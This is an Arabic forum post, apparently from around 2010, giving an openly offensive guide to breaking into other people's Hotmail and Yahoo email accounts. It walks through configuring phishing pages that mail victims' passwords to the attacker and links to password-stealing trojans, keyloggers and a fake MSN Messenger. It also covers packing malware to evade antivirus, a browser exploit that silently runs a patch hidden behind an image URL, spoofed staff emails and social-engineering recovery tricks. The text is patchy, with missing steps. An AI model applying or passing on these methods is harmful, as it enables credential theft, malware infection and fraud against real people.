Admin
المدير
●●[تاريخ التسجيل||~ : 21/11/2009
●●[المشاركات||~ : 127
●●[النقآط||~ : 1362
●●{الجنس||~ : 
●●[السٌّمعَة||~ : 0
●●[الموقع||~ : R-alwagt
●●[المزاج||~ : RAIQ
 |  موضوع: جميع طرق اختراق الايميل واروعها.. السبت فبراير 13, 2010 7:14 pm | |
|
اختراق البريد عن طريق البرامج ..
3-عن طريق تلغيم الصفحات ..
9-عن طريق معرفة المعلومات للضحيه ..
اولا : عن طريق الباتشات (شرح + تحميل ):
وهي الطريقة تعتمد على ارسال باتش سارق او احد برامج الكيلوقر وفيما يلي نستعرض بعض البرامج (الحديثة والقديمة )لسرقة الباسوردات :
البرنامج الاول:
الاسم hotmail hack
الحجم kb
التحميل : [IMG]http://www.h4palestine.com/download/hotmailhack.zip[/url]
الشرح :افتح البرنامج وراح تشاهد
قم باعداد الملف بتعبئة البيانات كالتالي:
الخانة الاولى: ايميلك الذي ستصلك عليه باسورد الضحية
الخانة الثانية: اليوزر نيم للضحية بدون hotmail.com - @msn.com@
الخانة الثالثة: اختار الدومين للايميل hotmail.com - @msn.com@
الخانة الرابعة :اسم موقع حقيقي يتلائم واهتمامات الضحية ..
ويفضل ان يكون ملئ بالصور والمحتويات التي تستغرق وقتا فى فتح كامل الصفحة
وفي الاخير اضغط لتكوين الملف
سيتكون ملف بامتداد htm قم باعادة تسميته باسم يتلائم مع اهتمامات الضحية ...وموضوع الموقع الذي قمت بكتابته عند اعداد الملف..
مع الحذر من ان تغيير الامتداد لانه سيفسد الملف.
(يعني الحين الضحية معاك في الماسنجر العب عليه وقله هذي صفحة لـ(طبعا هذا حسب اهتمامات الضحية )واكيد انت تكون حاط في البرنامج وصلة موقع لها صلة بلكلام اللى قلته للضحية )
ارسل الملف للضحية
حينما يقوم بفتحه ستفتح له شاشة مكتوب اعلاها اليوزرنيم الخاص به ..وتطلب ادخال كلمة السر
بمجرد كتابة كلمة السر سيتم ارسالها لك على ايميلك المحدد سابقا..
وهي اهم مرحلة وتسمى redirection كما سيتم فتح الموقع الذي قمت بتحديده امام الضحية
ستصلك كلمة السر على هيئة رسالة بريدية بعنوان Password Recieved
ومن الضروري الاشارة فى هذا ان الصفحة الخادعة التى تظهر للضحية بطلب ادخال الباسورد
يتم استضافتها لدى سيرفر response-o-matic server
وفى حالة عدم وصول الباسورد..قد يعزى ذلك لمشكلة بالسيرفر المضيف
اخطاء شائعة:
-لاترفع الصفحة إلى أحد مواقع الاستضافة !!!
لانه ماراح تقدر تحصل على الباسوورد حتى لو الضحية كتبه
ملاحظات:
-الباسوورد سوف يصلك على Junk Mail وليس Inbox وطبعا الJunk Mail يتمسح اسبوعيا!!!
-البرنامج لايمكن تطبيقه على نفسك لأنه على جهاز واحد ..علشان كذا لااحد يقول جربته على نفسي ومااشتغل!!!
-تستطيع ارسال الصفحة الى الضحية على الوضع Attach اي كملف مرفق .
البرنامج الثاني:
اسم البرنامج :b-sspy
الحجم : 146 kb
التحميل :
الشرح :
افتح البرنامج ومن ثم افتح ملف الاعداد B-S EditServer كما بالصورة :
راح تظهر لك هذي الصورة كل ما عليك هو تعبئة البيانات كما في الصورة :
الحين كذا خلصنا من تجهيز سيرفر البرنامج كل ماعليك هو ارسال الباتش وانتظر الباسوردات
ملاحظة : البرنامج لا يعمل في وندوز اكس بي !!
البرنامج الثالث :
اسم البرنامج:برنامج الانتفاضة
الحجم : 172 kb
التحميل :http://www.h4palestine.com/download/hotmail.zip
الشرح :
افتح البرنامج ومن ثم افتح ملف الاعداد hotmail كما في الصورة :
http://waleedessam80.malware-site.www/pas3...AgentV1.21.zip
الشرح :
كل ما عليك تحميل البرنامج وبالمناسبة هذا هو افضل برنامج حديث لسرقة الباسوردات
http://waleedessam80.malware-site.www/pas1...om/iksetup.exe
الشرح :
لاصطياد البرامج ,ينزل على Win من دون أن يشعر أحد بذلك وتشمل السرقة الخاصة بهذا البرنامج Usernames & Passwords وأيضا المنافذ النشطة ذو ملفات txt ويشمل AOL, YAHOO, ICQ, MSN , AIM.
البرنامج السابع :
اسم البرنامج :
التحميل :
http://ym2400z.virtualave.net/cgi-b...s/msn/fmsn5.zip
هو نسخة مزيفة لبرنامج ام اس ان ميسينجر وكل ماعليك ان تقوم بارسال البرنامج للضحية ..وحينما يقوم بفتحه سيفتح له الميسينجر المزيف
والمتطابق مع الاصلي فى كل الوظائف سيقوم الضحية بادخال اليوزر نيم والباسورد فتظهر له رسالة خطا ومنها سيتم تسجيل كلمة السر فى جهازه بالمسار التالي:
على هيئة ملف نصي يمكن قراءته بالنوت باد
وللحصول على الملف:
وعجزت عن الحصول على باسورداته خاصة الكاش والتى يقوم الويندوز اكس بي بتشفيرها بدقة128 بت عالية التعقيد
والتى مازالت برامج التروجان لاتحل شفرتها
وبالتالي كل ماعليك خلال الاختراق ان تحصل على الملف من المسار المطلوب
يلاحظ انه لمعرفة هل الميسينجر اصلي ام مزيف يتم كتابة اليوزر نبم about والباسورد fmsn
فاذا ظهرت لك الشاشة الموضحة عاليا المكتوب عليها fake msn فهو المزيف
وايضا المزيف به باج لم يتم حله وهو عدم امكانية عمل streching اي لايمكن تغيير نسب الميسينجر
اسم البرنامج :العطار (عربي )
الحجم : kb 241
التحميل : http://www.alattar.s5.com/attar.zip
او من هنا : http://www.h4palestine.com/download/attar.zip
الشرح :
افتح البرنامج ووو......شاهد الصور مع انها ما تحتاج لشرح
http://waleedessam80.malware-site.www/pas9...nload/k2ps.zip
الهدية الثانية للمبتدئين شرح برنامج k2ps الجديد
البرنامج العاشر :
اسم البرنامج : barrio5
الحجم 50 kb
التحميل + الشرح = هنا بالمنتدى
للتحميل :http://www.h4palestine.com/download/barrio5.zip
شرح بالصور لبرنامج barrio_v.5 لجلب الباسوردات
البرنامج الحادي عشر :
اسم البرنامج :stukach
التحميل + الشرح = هنا بالمنتدى
للتحميل : http://www.h4palestine.com/download/stukach.zip
برنامج لسرقة الأيميلات stukach
البرنامج الثاني عشر :
اسم البرنامج :barok
التحميل + الشرح = هنا بالمنتدى
شرح برنامج barok
http://marsi.malware-site.www/tk.GIF[/IMG]...d.lycos.co.uk/
سجل فيه
اظنها سهلة ما يبغالها شرح
يعني تعطي اللنك الى فيه صفحة الphp الى الضحية..وتخليه يعبي البيانات المطلوبة
والطريقة انا شارحها هنا بالمتندى بالتفصيل +الصور :
شرح ممل لاختراق بريد الهوتميل عن طريق صفحة الـــ php...
ثالثا:اختراق البريد عن طريق تلغيم الصفحات :
ويتم ذلك بواسطة برنامج godwill
وظيفة البرنامج :له وظائف كثيرة ..افضلها وهي إنك تصمم صفحة مدموجة بباتش
وترسلها للضحية وأول مايفتحها الضحية راح يجيلك الباسوورد وكل شي على حسب السيرفر أو الباتش اللي حطيته بالصفحة.
الشـــرح + التحميل
تم شرحه هنا بالمنتدى بالتفصيل +بالصور
شرح برنامج الاسطورة godwill لعمل مواقع ملغومة وارسال ايميلات ومسجات اسيكيو
او عن طريق برنامج noob
نفس الوظيفة ..بس لولا اختلاف الأراء لبانت السلع
وقد تم شرحه ايضا هنا بالمنتدى بالصور
رابعا:اختراق البريد عن طريق اختراق الاجهزة:
طبعا الطريقة واضحة جدا
كل ما عليك انك تجهز باتش لبرنامج اختراق فيه خاصية اظهار الباسووردات
والبرامج كثيرة ومنها
sub7gold
و ....الخ
وقد تم شرح البرامج اللى في الاعلى هنا في المنتدى
!!
وبعدين رسل الباتش للضحية وخذ الايبي بتاعه من الدوز
وافتح البرنامج وحط الايبي ..والباقي اكيد انت عارفه
لكن اهم شيء انك تشفر الباتش وتضغطه حتى لا يستطيع النورتن بتاع الضحية اكتشافه
بعدين ما راح تقدر تسرق باسورداته الا اذا كان مسجلها ..يعني عامل حفظ SAVE
خامسا:اختراق البريد عن طريق ثغرات المتصفح :
المتطلبات:
اضغط هنا للتحميل
الشرح:
2-افتح برنامج evilhttp وضع الباتش في الخانة الاولى
واخترالثغرة (mpeg)في الخانة الثانية وخلي النافذة مفتوحة ..اكرر مفتوحة (لا تنزلها تحت، خلها فوق)
تكتب http://
وفي النهاية تكتب اي شي (على حسب اهتمام الضحية ) يعني يبصير كذا
[url]http://212.32.125.25/cgi-bafy/photo10256.jpg[/IMG]
ممكن تغير cgi-bafy/photo10256.jpg الى اي كلمة وكذلك الامتداد وذلك حسب الضحية بس الافضل امتداد لصورة لان لو وضعت exe راح يطلب منه تنزيل البرنامج ...ضع امتداد لصورة فقط او txt بس jpg افضل
توضيح اكثر:
4- بعد فتح الضحية للوصلة ..سيتم تحميل وتشغيل الباتش تلقائيا بدون موافقة الضحية داخل جهاز الضحية
والاهم الباسووردات راح تجي على ايميلك.
سادسا:اختراق البريد عن طريق برامج التخمين :
الطريقة مشهورة جدا..والبرامج التخمينية كثيرة مثل
وطريقة عمل هذه البرامج هي التخمين لا اكثر فهي تقوم بتخمين كلمات السر الموجوده باللسته بتاعت البرنامج لكن...هل تعلم كم نسبة نجاح هذه البرامج؟
نسبة نجاحها 10% نعم عشرة بالمئه قد اكون بالغت قليلا فنسبتها ضئيلة جدا
فاتحدى اي شخص يقول انا اخترقت ايميل عن طريق هذه البرامج..فهذه البرامج مستخدمينها كثيرين
والنتائج..لا شيء
الا اذا كان باسورد الضحية يعني زي 3 ارقام او حرف وارقام
هذا شرح لاحد افضل برامج التخمين +التحميل ....جرب يمكن تنفع !!
هدية الرابعة للمبتدئين(برنامج تخمين الباسوورد Brutus + الشرح بالصور )
سابعا:اختراق البريد عن طريق خداع الضحية (باحدى الطرق الذكية
طبعا الخدع كثيرة جدا جدا وكل واحد يستطيع ان يفعل احسن منها بكثير
وهذه بعض الامثلة..طبعا ما تنفع مع الهاكرز الين
وكلها بنفس الطريقة وهي
انك ترسل رسالة للضحية تقنعه فيها بان يكتب باسوورد ايميله
مثال1:/
أخترق أي بريد في الهوتميل بأستخدام نظام الأستطلاع :
** شرح موجز و مختصر لنظام الأستطلاع **
توفر مواقع مزودات البريد الألكنروني كالياهو و الهوتميل هذه الخدمة للهيئات الحكومية و الدولية
و عدد محدود من المواقع علي شبكة الأنترنت .
يسمح هذا النظام لهذه الهيئات الدولية و الحكومية بإستطلاع أي بريد في أحدي هذه المواقع .
** الفائدةالأساسية من الخدمة **
هو مراقبة البريد الألكتروني لأشخاص المشتبه بهم عالميا و دوليا
أو مراقبة بريد الأشخاص الذين يستخدمون البريد الألكتروني لعقد أعمالهم الأجرامية المشبوهة .
و علي الصعيد العربي تستخدم هذه الخدمة ( في السعودية علي وجه الخصوص )
في مراقبة مروجي الصور و الأفلام الجنسية و من يسئء لأسلام علي وجه العموم.
في 19 - 6 - 2002 أستطاع 120 هكرز عالمي من بينهم 4 عرب ( أنا واحد منهم )بتوفير هذه الخدمة لعدد كبير من الهكرز .
و نظرا لأنتشار هذه الطريقة علي المستوي العالمي بواسطة هؤلاء الهكر .
قررنا نحن الأربعة العرب بنشر هذا الطريقة علي المستوي العربي .
** الطريفة كالتالي **
romansy_766@hotmail.com
2. قم بكتابة الموضوع بأسم "Pass Word المرسل"
Code : 127_TheARAbFoX6_632HaCK_497
بعد 3 ساعات ستصلك رسالة بعد التأكد من البيانات المرسلة
تحتوي الرسالة علي Text و زر تكتب في Text الربيد ثم تضغط علي الزر
ثم تستطلع البريد الذي كتبته في Text
ملاحظة :
أتمني أن يكون قد قدمت خدمة كبيرة للوطن العربي العزيز.
و شكرا .
مثال2:/
أولا اذهب إلى هذه الصفحة:
http://coolstuffclickhere.com/emailer.htm
وهي عبارة عن Anonymous E-Mailer Page مجانية أي ممكن ترسل رسائل بعناويين مزيفة
(كما تفعل الكثير من البرامج ولكن الصفحة أسهل وأسرع واضمن)
وهي تخفي الآيبي الحقيقي عن متلقي الرسالة
ثانيا تضع المعلومات المطلوبة وهي
Staff@hotmail.com مع "S" كبيرة ..
وهنا المفاجأة حيث ستظهر أمام الرسالة عند المتلقي علامة الفراشة التابعة لـ MSN لإعطاء انطباع الرسمية
(ملاحظة يجب أن تكون Capital S وليس Small S عند كتابة Staff ..
Subject:عاد هنا أنت ومهارتك لازم تشد انتباه القارىء صاحب البريد بكلمات مثل
وفي الرسالة تكتب له أن عليه إرسال الباسوورد إلى عنوان معين
حتى لا يفقده وأن تحدد له هذا العنوان (طبعا غير اللى فوق)وتكون فاتحه مسبقاً ..
واذا أردت التبرير ممكن تقول أن حسابه بالبريد يقع على أحد الخادمات التي تعطلت
ويجب عليه التعاون بسرعة لكي يتجنب فقد حسابه حيث أن معلومات المستخمين الآن على سيرفر احتياطي ..؟؟
وهناك من المغفلين الكثر
ومن ثم انتظر الرد خ خ خ خ
ثامنا:اختراق البريد عن طريق اكواد HTML:
دائما نسمع عن الاختراق باكواد HTML ولكننا لم ندرك ما هي هي عبارة عن كود تقوم بارساله فى رساله لصديقك
و الكود هذا بيعتمد على مدى ذكائك..
المتطلبات: ايميل في الياهو فقط
الطريقة:[/B
]-كون رساله جديده طبعا في ايميلك على الياهو
-اعمل علامه صح على تشغيل خاصيه HTML (راح تجدها اخر الرسالة).
-في خانة TO اكتب ايميل الضحية.
-في خانة subject اكتب عنوان الموضوع.
-ضع الكود بالرساله (لتحميل الكود ضمن المرفقات)
مع تغير الكلام المكتوب بالعربى..كالاتي
في السطر التاسع عشر 19 بالكود >>اكتب ايميلك على الياهوو كامل
في السطراثنين وعشرون 22 بالكود >>اكتب اسم ايميلك على الياهوو من غير @YAHOO.COM
في السطر66 >>اكتب اسم الايميل اللى انت عايز تسرقه
[b]ملحوظه :
تشغيل خاصيه html قبل وضع الكود بالرساله
-------
كيف ممكن تقنع صديقك بانه يحط الباسورد؟؟
ممكن تعمل ايميل باسم
info@yahoo.com
service@yahoo.com
او اسشتخدم اي برنامج لارسال اي رسالة من ايميل مجهول وليكن KABOOM
و تكتب مثلا في الـ subject:
Do u Yahoo!!do u want to increase your hotmail account using yahoo
تاسعا :اختراق البريد عن طريق معرفة المعلومات للضحيه :
طبعا هذه الطريقه من اختراق الايميل لاتعتبر اختراق بحد ذاته وانما ذكاء من الخترق للايميل
وهي معرفة بعض المعلومات عن الايميل المراد اختراقه وارسال رساله الى service_x@hotmail.com
واذا اقتنعوا انه صحيح ..سوف يرسلون لك رساله بكلمة المرور اليس هذه النقطه سهله
لكن يجب انت تعرف المعلومات
عاشرا:اختراق البريد عن طريق معرفة الجواب السري للضحية:
طبعا الطريقة شبه مستحيلة...لكن ممكن انك تفكر شوي وتحاول
وهي إنك تدخل موقع الـ htomail
http://www.hotmail.com/
وتروح عند
?Forgot Your Password
E-mail Address أكتب الإيميل المراد اختراقه أو استرجاعه
وبعد ذلك قم بالضغط على Continue
بعدها راح تفتحلك صفحة اضغط مرة أخرى على Continue بدون تغيير أي شيء
وبعدين راح تخش على الإيميل إذا كان اختيارك للمدينة صحيح فسوف تظهر هذه الخيارات
وإذا كان لأ راح يوديك للـStep رقم 1
أوكي نكمل ألحين مثلا نفرض ان المدينة اللي حطيتها صح راح تطلعلك هذي الخيارات
طبعا هنا راح تكتب الباسوورد الجديد للإيميل واللي راح تكون جاهزة
لكن ماراح تنفع إلا إذا كان جوابك صح New Password
إعادة الباسوور الجديدة اللي كتبتها مسبقا Retype New Password
وبعدها اضغط Continue وراح تخترق الإيميل إذا كان الجواب صحيح ........
احدى عشر : استرجاع الايميل المسروق :
طريقتين هم لا اكثر ..
http://registernet.passport.net/con...f?lc=1033&sd;=h
2-تقوم بإرسال رسالة إلى شركة الهوتميل وهو
service_x@hotmail.com
وتكتب عنوان الرسالة:
وتملأ هذا النموذج :
- last mane : أسمك الأخير
- Sign-in name : ايميلك المسروق
- Country/region : الدولة
- State : المدينه
- Zip or postal code : رقم الكود(رقم كود السعودية966)
- Approximate date of last successful sign-in or approximate date of account registration : تاريخ آخر يوم فتحت إيميلك
- The name of your ISP :
- As many "old" outdated passwords you used in the past as you can remember وهنا تكتب كلمات السر القديمة التى تتذكرها
وبعد الإنتهاء ....تقوم بإرسالها
وستصلك هذه الرساله مباشره بعد ارسال المعلومات هذا نصها :
your support inquiry.
الخ..
اذا كانت المعلومات ناقصه اوغير صحيحة ستاتيك هذه الرساله :
Thank you for writing to MSN Hotmail. This is Janice, and I am writing in
response to your password concerns.
Kindly provide the following information for verification purposes.
- Name (first and last)
- Sign-in name
الخ..
اذا كانت البيانات التى ارسلتها مقنعه سيرسلون لك هذه الرساله بعد ساعة أو بالكثير 3 ساعات وبها كلمة السر :
الخ.... وراح تجد الباسورد | |
|
